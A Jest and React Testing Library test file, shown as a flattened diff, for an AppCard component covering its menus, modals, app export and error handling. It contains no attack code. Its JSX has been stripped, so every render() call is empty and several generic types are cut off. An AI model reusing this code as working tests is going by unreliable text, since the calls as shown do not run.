onPlanInfoChanged: mockOnPlanInfoChanged, + }), +})) + +// Mock global public store - allow dynamic configuration +let mockWebappAuthEnabled = false +jest.mock('@/context/global-public-context', () => ({ + useGlobalPublicStore: (selector: (s: any) => any) => selector({ + systemFeatures: { + webapp_auth: { enabled: mockWebappAuthEnabled }, + branding: { enabled: false }, + }, + }), +})) + +// Mock API services - import for direct manipulation +import * as appsService from '@/service/apps' +import * as workflowService from '@/service/workflow' + +jest.mock('@/service/apps', () => ({ + deleteApp: jest.fn(() => Promise.resolve()), + updateAppInfo: jest.fn(() => Promise.resolve()), + copyApp: jest.fn(() => Promise.resolve({ id: 'new-app-id' })), + exportAppConfig: jest.fn(() => Promise.resolve({ data: 'yaml: content' })), +})) + +jest.mock('@/service/workflow', () => ({ + fetchWorkflowDraft: jest.fn(() => Promise.resolve({ environment_variables: [] })), +})) + +jest.mock('@/service/explore', () => ({ + fetchInstalledAppList: jest.fn(() => Promise.resolve({ installed_apps: [{ id: 'installed-1' }] })), +})) + +jest.mock('@/service/access-control', () => ({ + useGetUserCanAccessApp: () => ({ + data: { result: true }, + isLoading: false, + }), +})) + +// Mock hooks +const mockOpenAsyncWindow = jest.fn() +jest.mock('@/hooks/use-async-window-open', () => ({ + useAsyncWindowOpen: () => mockOpenAsyncWindow, +})) + +// Mock utils +jest.mock('@/utils/app-redirection', () => ({ + getRedirection: jest.fn(), +})) + +jest.mock('@/utils/var', () => ({ + basePath: '', +})) + +jest.mock('@/utils/time', () => ({ + formatTime: () => 'Jan 1, 2024', +})) + +// Mock dynamic imports +jest.mock('next/dynamic', () => { + const React = require('react') + return (importFn: () => Promise) => { + const fnString = importFn.toString() + + if (fnString.includes('create-app-modal') || fnString.includes('explore/create-app-modal')) { + return function MockEditAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'edit-app-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-edit-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Updated App', + icon_type: 'emoji', + icon: '🎯', + icon_background: '#FFEAD5', + description: 'Updated description', + use_icon_as_answer_icon: false, + max_active_requests: null, + }), + 'data-testid': 'confirm-edit-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('duplicate-modal')) { + return function MockDuplicateAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'duplicate-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-duplicate-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Copied App', + icon_type: 'emoji', + icon: '📋', + icon_background: '#E4FBCC', + }), + 'data-testid': 'confirm-duplicate-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('switch-app-modal')) { + return function MockSwitchAppModal({ show, onClose, onSuccess }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'switch-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-switch-modal' }, 'Close'), + React.createElement('button', { 'onClick': onSuccess, 'data-testid': 'confirm-switch-modal' }, 'Switch'), + ) + } + } + if (fnString.includes('base/confirm')) { + return function MockConfirm({ isShow, onCancel, onConfirm }: any) { + if (!isShow) return null + return React.createElement('div', { 'data-testid': 'confirm-dialog' }, + React.createElement('button', { 'onClick': onCancel, 'data-testid': 'cancel-confirm' }, 'Cancel'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-confirm' }, 'Confirm'), + ) + } + } + if (fnString.includes('dsl-export-confirm-modal')) { + return function MockDSLExportModal({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'dsl-export-modal' }, + React.createElement('button', { 'onClick': () => onClose?.(), 'data-testid': 'close-dsl-export' }, 'Close'), + React.createElement('button', { 'onClick': () => onConfirm?.(true), 'data-testid': 'confirm-dsl-export' }, 'Export with secrets'), + React.createElement('button', { 'onClick': () => onConfirm?.(false), 'data-testid': 'confirm-dsl-export-no-secrets' }, 'Export without secrets'), + ) + } + } + if (fnString.includes('app-access-control')) { + return function MockAccessControl({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'access-control-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-access-control' }, 'Close'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-access-control' }, 'Confirm'), + ) + } + } + return () => null + } +}) + +// Popover uses @headlessui/react portals - mock for controlled interaction testing +jest.mock('@/app/components/base/popover', () => { + const MockPopover = ({ htmlContent, btnElement, btnClassName }: any) => { + const [isOpen, setIsOpen] = React.useState(false) + const computedClassName = typeof btnClassName === 'function' ? btnClassName(isOpen) : '' + return React.createElement('div', { 'data-testid': 'custom-popover', 'className': computedClassName }, + React.createElement('div', { + 'onClick': () => setIsOpen(!isOpen), + 'data-testid': 'popover-trigger', + }, btnElement), + isOpen && React.createElement('div', { + 'data-testid': 'popover-content', + 'onMouseLeave': () => setIsOpen(false), + }, + typeof htmlContent === 'function' ? htmlContent({ open: isOpen, onClose: () => setIsOpen(false), onClick: () => setIsOpen(false) }) : htmlContent, + ), + ) + } + return { __esModule: true, default: MockPopover } +}) + +// Tooltip uses portals - minimal mock preserving popup content as title attribute +jest.mock('@/app/components/base/tooltip', () => ({ + __esModule: true, + default: ({ children, popupContent }: any) => React.createElement('div', { title: popupContent }, children), +})) + +// TagSelector has API dependency (service/tag) - mock for isolated testing +jest.mock('@/app/components/base/tag-management/selector', () => ({ + __esModule: true, + default: ({ tags }: any) => { + const React = require('react') + return React.createElement('div', { 'aria-label': 'tag-selector' }, + tags?.map((tag: any) => React.createElement('span', { key: tag.id }, tag.name)), + ) + }, +})) + +// AppTypeIcon has complex icon mapping - mock for focused component testing +jest.mock('@/app/components/app/type-selector', () => ({ + AppTypeIcon: () => React.createElement('div', { 'data-testid': 'app-type-icon' }), +})) + +// Import component after mocks +import AppCard from './app-card' + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Record = {}) => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + mode: AppModeEnum.CHAT, + icon: '🤖', + icon_type: 'emoji' as const, + icon_background: '#FFEAD5', + icon_url: null, + author_name: 'Test Author', + created_at: 1704067200, + updated_at: 1704153600, + tags: [], + use_icon_as_answer_icon: false, + max_active_requests: null, + access_mode: AccessMode.PUBLIC, + has_draft_trigger: false, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as any, + app_model_config: {} as any, + site: {} as any, + api_base_url: 'https://api.example.com', + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('AppCard', () => { + const mockApp = createMockApp() + const mockOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + mockOpenAsyncWindow.mockReset() + mockWebappAuthEnabled = false + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + // Use title attribute to target specific element + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app name', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app description', () => { + render() + expect(screen.getByTitle('Test app description')).toBeInTheDocument() + }) + + it('should display author name', () => { + render() + expect(screen.getByTitle('Test Author')).toBeInTheDocument() + }) + + it('should render app icon', () => { + // AppIcon component renders the emoji icon from app data + const { container } = render() + // Check that the icon container is rendered (AppIcon renders within the card) + const iconElement = container.querySelector('[class*="icon"]') || container.querySelector('img') + expect(iconElement || screen.getByText(mockApp.icon)).toBeTruthy() + }) + + it('should render app type icon', () => { + render() + expect(screen.getByTestId('app-type-icon')).toBeInTheDocument() + }) + + it('should display formatted edit time', () => { + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should handle different app modes', () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle app with tags', () => { + const appWithTags = { + ...mockApp, + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + } + render() + // Verify the tag selector component renders + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should render with onRefresh callback', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('Access Mode Icons', () => { + it('should show public icon for public access mode', () => { + const publicApp = { ...mockApp, access_mode: AccessMode.PUBLIC } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.anyone"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show lock icon for specific groups access mode', () => { + const specificApp = { ...mockApp, access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.specific"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show organization icon for organization access mode', () => { + const orgApp = { ...mockApp, access_mode: AccessMode.ORGANIZATION } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.organization"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show external icon for external access mode', () => { + const externalApp = { ...mockApp, access_mode: AccessMode.EXTERNAL_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.external"]') + expect(tooltip).toBeInTheDocument() + }) + }) + + describe('Card Interaction', () => { + it('should handle card click', () => { + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]') + expect(card).toBeInTheDocument() + }) + + it('should call getRedirection on card click', () => { + const { getRedirection } = require('@/utils/app-redirection') + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]')! + fireEvent.click(card) + expect(getRedirection).toHaveBeenCalledWith(true, mockApp, mockPush) + }) + }) + + describe('Operations Menu', () => { + it('should render operations popover', () => { + render() + expect(screen.getByTestId('custom-popover')).toBeInTheDocument() + }) + + it('should show edit option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should show duplicate option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + }) + }) + + it('should show export option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.export')).toBeInTheDocument() + }) + }) + + it('should show delete option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + + it('should show switch option for chat mode apps', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should show switch option for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should not show switch option for workflow mode apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.queryByText(/switch/i)).not.toBeInTheDocument() + }) + }) + }) + + describe('Modal Interactions', () => { + it('should open edit modal when edit button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const editButton = screen.getByText('app.editApp') + fireEvent.click(editButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + }) + + it('should open duplicate modal when duplicate button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const duplicateButton = screen.getByText('app.duplicate') + fireEvent.click(duplicateButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + }) + + it('should open confirm dialog when delete button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + }) + + it('should close confirm dialog when cancel is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('cancel-confirm')) + + await waitFor(() => { + expect(screen.queryByTestId('confirm-dialog')).not.toBeInTheDocument() + }) + }) + + it('should close edit modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-edit-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('edit-app-modal')).not.toBeInTheDocument() + }) + }) + + it('should close duplicate modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-duplicate-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('duplicate-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Styling', () => { + it('should have correct card container styling', () => { + const { container } = render() + const card = container.querySelector('[class*="h-[160px]"]') + expect(card).toBeInTheDocument() + }) + + it('should have rounded corners', () => { + const { container } = render() + const card = container.querySelector('[class*="rounded-xl"]') + expect(card).toBeInTheDocument() + }) + }) + + describe('API Callbacks', () => { + it('should call deleteApp API when confirming delete', async () => { + render() + + // Open popover and click delete + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + // Confirm delete + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + }) + }) + + it('should call onRefresh after successful delete', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should handle delete failure', async () => { + (appsService.deleteApp as jest.Mock).mockRejectedValueOnce(new Error('Delete failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Delete failed') }) + }) + }) + + it('should call updateAppInfo API when editing app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + }) + }) + + it('should call copyApp API when duplicating app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + }) + }) + + it('should call onPlanInfoChanged after successful duplication', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(mockOnPlanInfoChanged).toHaveBeenCalled() + }) + }) + + it('should handle copy failure', async () => { + (appsService.copyApp as jest.Mock).mockRejectedValueOnce(new Error('Copy failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + }) + + it('should call exportAppConfig API when exporting', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + }) + }) + + it('should handle export failure', async () => { + (appsService.exportAppConfig as jest.Mock).mockRejectedValueOnce(new Error('Export failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + describe('Switch Modal', () => { + it('should open switch modal when switch button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + + it('should close switch modal when close button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('close-switch-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('switch-modal')).not.toBeInTheDocument() + }) + }) + + it('should call onRefresh after successful switch', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should open switch modal for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore', () => { + it('should show open in explore option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + }) + + describe('Workflow Export with Environment Variables', () => { + it('should check for secret environment variables in workflow apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should show DSL export modal when workflow has secret variables', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + }) + + it('should check for secret environment variables in advanced chat apps', async () => { + const advancedChatApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should close DSL export modal when onClose is called', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onClose + fireEvent.click(screen.getByTestId('close-dsl-export')) + + await waitFor(() => { + expect(screen.queryByTestId('dsl-export-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Edge Cases', () => { + it('should handle empty description', () => { + const appNoDesc = { ...mockApp, description: '' } + render() + expect(screen.getByText('Test App')).toBeInTheDocument() + }) + + it('should handle long app name', () => { + const longNameApp = { + ...mockApp, + name: 'This is a very long app name that might overflow the container', + } + render() + expect(screen.getByText(longNameApp.name)).toBeInTheDocument() + }) + + it('should handle empty tags array', () => { + const noTagsApp = { ...mockApp, tags: [] } + // With empty tags, the component should still render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle missing author name', () => { + const noAuthorApp = { ...mockApp, author_name: '' } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle null icon_url', () => { + const nullIconApp = { ...mockApp, icon_url: null } + // With null icon_url, the component should fall back to emoji icon and render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should use created_at when updated_at is not available', () => { + const noUpdateApp = { ...mockApp, updated_at: 0 } + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + + it('should handle agent chat mode apps', () => { + const agentApp = { ...mockApp, mode: AppModeEnum.AGENT_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle advanced chat mode apps', () => { + const advancedApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle apps with multiple tags', () => { + const multiTagApp = { + ...mockApp, + tags: [ + { id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }, + { id: 'tag2', name: 'Tag 2', type: 'app', binding_count: 0 }, + { id: 'tag3', name: 'Tag 3', type: 'app', binding_count: 0 }, + ], + } + render() + // Verify the tag selector renders (actual tag display is handled by the real TagSelector component) + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should handle edit failure', async () => { + (appsService.updateAppInfo as jest.Mock).mockRejectedValueOnce(new Error('Edit failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Edit failed') }) + }) + }) + + it('should close edit modal after successful edit', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render all app modes correctly', () => { + const modes = [ + AppModeEnum.CHAT, + AppModeEnum.COMPLETION, + AppModeEnum.WORKFLOW, + AppModeEnum.ADVANCED_CHAT, + AppModeEnum.AGENT_CHAT, + ] + + modes.forEach((mode) => { + const testApp = { ...mockApp, mode } + const { unmount } = render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + unmount() + }) + }) + + it('should handle workflow draft fetch failure during export', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockRejectedValueOnce(new Error('Fetch failed')) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Additional Edge Cases for Coverage + // -------------------------------------------------------------------------- + describe('Additional Coverage', () => { + it('should handle onRefresh callback in switch modal success', async () => { + const chatApp = createMockApp({ mode: AppModeEnum.CHAT }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + // Trigger success callback + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render popover menu with correct styling for different app modes', async () => { + // Test completion mode styling + const completionApp = createMockApp({ mode: AppModeEnum.COMPLETION }) + const { unmount } = render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + unmount() + + // Test workflow mode styling + const workflowApp = createMockApp({ mode: AppModeEnum.WORKFLOW }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should stop propagation when clicking tag selector area', () => { + const multiTagApp = createMockApp({ + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + }) + + render() + + const tagSelector = screen.getByLabelText('tag-selector') + expect(tagSelector).toBeInTheDocument() + + // Click on tag selector wrapper to trigger stopPropagation + const tagSelectorWrapper = tagSelector.closest('div') + if (tagSelectorWrapper) + fireEvent.click(tagSelectorWrapper) + }) + + it('should handle popover mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByTestId('popover-content')).toBeInTheDocument() + }) + + // Trigger mouse leave on the outer popover-content + fireEvent.mouseLeave(screen.getByTestId('popover-content')) + + await waitFor(() => { + expect(screen.queryByTestId('popover-content')).not.toBeInTheDocument() + }) + }) + + it('should handle operations menu mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + // Find the Operations wrapper div (contains the menu items) + const editButton = screen.getByText('app.editApp') + const operationsWrapper = editButton.closest('div.relative') + + // Trigger mouse leave on the Operations wrapper to call onMouseLeave + if (operationsWrapper) + fireEvent.mouseLeave(operationsWrapper) + }) + + it('should click open in explore button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + // Verify openAsyncWindow was called with callback and options + await waitFor(() => { + expect(mockOpenAsyncWindow).toHaveBeenCalledWith( + expect.any(Function), + expect.objectContaining({ onError: expect.any(Function) }), + ) + }) + }) + + it('should handle open in explore via async window', async () => { + // Configure mockOpenAsyncWindow to actually call the callback + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + await callback() + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + const { fetchInstalledAppList } = require('@/service/explore') + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalledWith(mockApp.id) + }) + }) + + it('should handle open in explore API failure', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('API Error')) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Access Control', () => { + it('should render operations menu correctly', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + 